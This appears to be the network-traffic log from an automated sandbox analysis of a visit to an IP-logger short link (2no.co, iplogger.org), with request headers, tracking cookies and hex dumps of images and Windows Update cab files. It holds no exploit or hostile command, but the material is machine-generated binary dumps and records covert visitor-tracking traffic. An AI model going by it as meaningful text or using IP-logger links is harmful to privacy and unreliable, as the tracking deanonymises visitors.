                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:22 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 6e 6f 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 32 2e 31 31 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f
                                                                                                Data Ascii: [{"age":2,"body":{"elapsed_time":863,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"172.67.132.113","status_code":403,"type":"http.error"},"type":"network-error","url":"https://
                                                                                                2024-07-29 22:46:22 UTC168INHTTP/1.1 200 OK
                                                                                                Content-Length: 0
                                                                                                date: Mon, 29 Jul 2024 22:46:22 GMT
                                                                                                Via: 1.1 google
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.749730172.67.132.1134437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:23 UTC577OUTGET /favicon.ico HTTP/1.1
                                                                                                Host: cdn.iplogger.org
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:23 UTC767INHTTP/1.1 200 OK
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Content-Type: image/x-icon
                                                                                                Content-Length: 2833
                                                                                                Connection: close
                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                etag: "629f3a26-b11"
                                                                                                strict-transport-security: max-age=31536000
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                Cache-Control: max-age=14400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 5861
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilFQQzuA4afABT3TeZRGQ7mBTEa%2Fy7Ruu2BC%2F4Qvx4L%2F%2BMrHA0jWLNTRhtENISkJp%2BObX0YaFw%2FZKf7iMW8%2BM1GrJyMWbTi29ir2FlUBOTMg%2B0GuHl%2FoJxyonQNEdTQhFnWU"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ab0a50adc0543bf-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-07-29 22:46:23 UTC602INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                2024-07-29 22:46:23 UTC1369INData Raw: 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a
                                                                                                Data Ascii: b9Ad<x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFz
                                                                                                2024-07-29 22:46:23 UTC862INData Raw: c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12
                                                                                                Data Ascii: &RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.74973188.212.201.2044437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:23 UTC509OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1
                                                                                                Host: counter.yadro.ru
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6; VID=2DNPIG0nbdur1cg1k-0018Z0
                                                                                                2024-07-29 22:46:23 UTC459INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.17.9
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Content-Type: image/gif
                                                                                                Content-Length: 445
                                                                                                Connection: close
                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                Pragma: no-cache
                                                                                                Cache-control: no-cache
                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                2024-07-29 22:46:23 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                                                Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.749734172.67.132.1134437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:23 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                                                Host: cdn.iplogger.org
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:23 UTC761INHTTP/1.1 200 OK
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Content-Type: image/x-icon
                                                                                                Content-Length: 2833
                                                                                                Connection: close
                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                etag: "629f3a26-b11"
                                                                                                strict-transport-security: max-age=31536000
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                Cache-Control: max-age=14400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 5861
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Fq8xFJxy1CFmg%2FhGgtf8tpavgBYSBpENAHMDTzb5qzGD8spBaYR3KLF0dIK1SGQYi4BDQyuc%2F%2BJoEPk6ZIULhvfAK5AitLlt0QPfLImLw6C%2BHGFgqz9AwqgoFYmP%2FgKxm%2FQ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ab0a50f09870f5f-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-07-29 22:46:23 UTC608INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                2024-07-29 22:46:23 UTC1369INData Raw: 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23
                                                                                                Data Ascii: <x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#
                                                                                                2024-07-29 22:46:23 UTC856INData Raw: 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9
                                                                                                Data Ascii: S]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.74972913.85.23.86443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:23 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
                                                                                                2024-07-29 22:46:25 UTC560INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                MS-CorrelationId: ba1871d7-a3ce-4592-aca2-0d5d1406282f
                                                                                                MS-RequestId: 88c40095-b7f0-4b2a-9919-2d4ffea5e80d
                                                                                                MS-CV: A1mpsd3HlkCWGiIR.0
                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Mon, 29 Jul 2024 22:46:23 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 24490
                                                                                                2024-07-29 22:46:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                2024-07-29 22:46:25 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.749737184.28.90.27443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:25 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-07-29 22:46:26 UTC467INHTTP/1.1 200 OK
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                Content-Type: application/octet-stream
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Server: ECAcc (chd/073B)
                                                                                                X-CID: 11
                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                Cache-Control: public, max-age=202600
                                                                                                Date: Mon, 29 Jul 2024 22:46:25 GMT
                                                                                                Connection: close
                                                                                                X-CID: 2


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.749742184.28.90.27443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:27 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Range: bytes=0-2147483646
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-07-29 22:46:27 UTC515INHTTP/1.1 200 OK
                                                                                                ApiVersion: Distribute 1.1
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                Content-Type: application/octet-stream
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                X-CID: 11
                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                Cache-Control: public, max-age=202641
                                                                                                Date: Mon, 29 Jul 2024 22:46:27 GMT
                                                                                                Content-Length: 55
                                                                                                Connection: close
                                                                                                X-CID: 2
                                                                                                2024-07-29 22:46:27 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.74974313.85.23.86443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:47:03 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
                                                                                                2024-07-29 22:47:04 UTC560INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                MS-CorrelationId: eaacc733-736d-4732-8f5a-73d30ee6b591
                                                                                                MS-RequestId: d391bb12-61ce-4f44-9266-fbd030a04a7c
                                                                                                MS-CV: WR/4wcfe6EC0yfvk.0
                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Mon, 29 Jul 2024 22:47:03 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 30005
                                                                                                2024-07-29 22:47:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                2024-07-29 22:47:04 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
